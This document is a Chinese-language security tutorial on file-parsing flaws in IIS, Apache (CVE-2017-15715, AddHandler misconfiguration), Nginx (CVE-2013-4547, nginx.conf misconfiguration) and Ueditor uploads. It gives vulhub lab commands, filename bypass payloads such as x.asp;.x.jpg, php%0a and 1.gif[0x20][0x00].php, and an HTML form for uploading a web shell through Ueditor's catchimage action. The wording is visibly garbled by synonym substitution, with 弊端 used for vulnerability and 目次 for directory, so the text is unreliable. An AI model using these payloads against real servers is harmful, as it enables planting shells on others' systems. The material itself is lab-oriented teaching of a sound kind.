目次
一,中间件文件解析弊端-IIS&Apache&Nginx
-IIS 6 7 文件名 目次名
-Apache 换行解析 配置不当
1、换行解析-CVE-2017-15715
2、配置不当-.htaccess 配置不当
-Nginx 文件名逻辑 解析弊端
1、文件名逻辑-CVE-2013-4547
2、解析弊端-nginx.conf 配置不当
二,Web 应用编辑器-Ueditor 文件上传安全
三,实例 CMS&平台-中间件解析&编辑器引用
配套资源下载(百度网盘):
- 链接:https://pan.baidu.com/s/11Q9sAPQ9P_ReOP9PKL0ABg?pwd=jgg4
- 提取码:jgg4
-IIS 6 7 文件名 目次名
1 、文件名: x.asp;.x.jpg 2 、目次名: x.asp/x.jpg 3 、 IIS7.X 与 Nginx 解析弊端同等 弊端利用条件: 1,是这中间件 2,上传文件能不能修改上传目次大概上传的文件名能增加命名 如果上传的文件名固定大概目次也无法修改,那么这个解析弊端就无用武之地 -Apache 换行解析 配置不当
1、换行解析-CVE-2017-15715
弊端环境:https://vulhub.org/#/environments/httpd/CVE-2017-15715/
其 2.4.0~2.4.29 版本中存在一个解析弊端 弊端利用条件: 1,是这个中间件 2,黑名单验证(在黑名单的后缀不让上传php jsp等),就可以通过php%0a绕过黑名单,但是需要包管这个后缀是能够正常解析的脚本代码。如果是白名单大概不行(在白名单里面才可以上传jpj,png,gif 等),但是如果没有考虑以最后一个点为后缀,通过1.jpj.php%0a的形式也大概能够绕过。 弊端复现 启动靶场 - xiaodi@ubuntu:~/vulhub-master/httpd/CVE-2017-15715$ sudo docker-compose build
- xiaodi@ubuntu:~/vulhub-master/httpd/CVE-2017-15715$ sudo docker-compose up -d
- xiaodi@ubuntu:~/vulhub-master/httpd/CVE-2017-15715$ sudo docker-compose down
弊端环境:https://vulhub.org/#/environments/httpd/apache_parsing_vulnerability/
AddHandler application/x-httpd-php .php
在有多个后缀的环境下,只要一个文件含有 .php后缀的文件即将被辨认成PHP文件,没必要是最后一个后缀。利用这个特性,将会造成一个可以绕过上传白名单的解析弊端。 弊端利用条件: 1,是这个中间件 2,文件名需要基于当地命名为准(就是文件上传后文件名不会被修改) 弊端复现 启动靶场 - xiaodi@ubuntu:~/vulhub-master/httpd/apache_parsing_vulnerability$ sudo docker-compose build
- xiaodi@ubuntu:~/vulhub-master/httpd/apache_parsing_vulnerability$ sudo docker-compose up -d
环境运行后,访问http://your-ip/uploadfiles/apache.php.jpeg即可发现,phpinfo被实验了,该文件被解析为php脚本。
http://your-ip/index.php中是一个白名单查抄文件后缀的上传组件,上传完成后并未重命名。我们可以通过上传文件名为xxx.php.jpg或xxx.php.jpeg的文件,利用Apache解析弊端举行getshell。
关闭靶场
- xiaodi@ubuntu:~/vulhub-master/httpd/apache_parsing_vulnerability$ sudo docker-compose down
-Nginx 文件名逻辑 解析弊端
弊端利用条件:符号中间件即可测试 1、文件名逻辑-CVE-2013-4547
影响版本: Nginx 0.8.41 ~ 1.4.3 / 1.5.0 ~ 1.5.7 弊端环境:https://vulhub.org/#/environments/nginx/CVE-2013-4547/ 弊端复现 启动弊端 - xiaodi@ubuntu:~/vulhub-master/nginx/CVE-2013-4547$ sudo docker-compose build
- xiaodi@ubuntu:~/vulhub-master/nginx/CVE-2013-4547$ sudo docker-compose up -d
这个环境是黑名单验证,我们无法上传php后缀的文件,需要利用CVE-2013-4547。我们上传一个“1.gif ”,留意背面的空格:
访问 http://your-ip:8080/uploadfiles/1.gif[0x20][0x00].php,即可发现PHP已被解析: 关闭弊端 - xiaodi@ubuntu:~/vulhub-master/nginx/CVE-2013-4547$ sudo docker-compose down
2、解析弊端-nginx.conf 配置不当
弊端环境:https://vulhub.org/#/environments/nginx/nginx_parsing_vulnerability/ 由此可知,该弊端与 Nginx 、 php 版本无关,属于用户配置不当造成的解析弊端。 弊端复现 启动弊端 - xiaodi@ubuntu:~/vulhub-master/nginx/nginx_parsing_vulnerability$ sudo docker-compose up -d
访问http://your-ip/uploadfiles/nginx.png/.php
关闭弊端
- xiaodi@ubuntu:~/vulhub-master/nginx/nginx_parsing_vulnerability$ sudo docker-compose down
二,Web 应用编辑器-Ueditor 文件上传安全
利用代码:
- <form
- action="http://192.168.46.139/net/controller.ashx?action=catchima
- ge" enctype="multipart/form-data" method="POST">
- <p>shell addr: <input type="text" name="source[]" /></p>
- <input type="submit" value="Submit" />
- </form>
|
